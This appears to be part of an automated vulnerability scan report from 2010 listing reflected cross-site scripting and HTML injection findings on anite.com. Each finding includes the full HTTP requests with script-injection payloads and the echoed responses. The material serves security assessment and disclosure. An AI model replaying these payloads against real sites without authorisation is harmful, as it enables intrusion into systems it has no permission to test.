<a href="http://anite.com/wireless-news-2.html?b652a"><a>07c58918796=1#up">
...[SNIP]...

1.265. http://anite.com/wireless-news-updates [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-news-updates

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e84"><script>alert(1)</script>d25582838de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wireless-news-updates18e84"><script>alert(1)</script>d25582838de HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-news-updates18e84"><script>alert(1)</script>d25582838de#up">
...[SNIP]...

1.266. http://anite.com/wireless-news-updates [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-news-updates

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27ce9"><a>75a783a4ce9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-news-updates?27ce9"><a>75a783a4ce9=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-news-updates?27ce9"><a>75a783a4ce9=1#up">
...[SNIP]...

1.267. http://anite.com/wireless-solutions-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-solutions-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adf28"><a>bc2aee58537 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-solutions-2.html?Itemid=211adf28"><a>bc2aee58537 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33487

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-solutions-2.html?Itemid=211adf28"><a>bc2aee58537#up">
...[SNIP]...

1.268. http://anite.com/wireless-solutions-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-solutions-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3300"><script>alert(1)</script>40c813fca17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e3300"><script>alert(1)</script>40c813fca17?Itemid=211 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33567

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e3300"><script>alert(1)</script>40c813fca17?Itemid=211#up">
...[SNIP]...

1.269. http://anite.com/wireless-solutions-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-solutions-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb633"><a>ea96d046c6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-solutions-2.html?Itemid=211&cb633"><a>ea96d046c6d=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33584

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-solutions-2.html?Itemid=211&cb633"><a>ea96d046c6d=1#up">
...[SNIP]...

1.270. http://anite.com/wireless-solutions-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-solutions-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9fc4"><a>1327ebc5bb4 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-solutions-3.html?Itemid=210b9fc4"><a>1327ebc5bb4 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34331

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-solutions-3.html?Itemid=210b9fc4"><a>1327ebc5bb4#up">
...[SNIP]...

1.271. http://anite.com/wireless-solutions-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-solutions-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417ef"><script>alert(1)</script>245ecc23cde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /417ef"><script>alert(1)</script>245ecc23cde?Itemid=210 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34409

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/417ef"><script>alert(1)</script>245ecc23cde?Itemid=210#up">
...[SNIP]...

1.272. http://anite.com/wireless-solutions-3.html [name of an arbitrarily supplied request parameter] previous

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-solutions-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10f6b"><a>dfe255f1099 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-solutions-3.html?Itemid=210&10f6b"><a>dfe255f1099=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34426

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-solutions-3.html?Itemid=210&10f6b"><a>dfe255f1099=1#up">
...[SNIP]...

Report generated by XSS.CX at Thu Nov 25 14:41:59 CST 2010.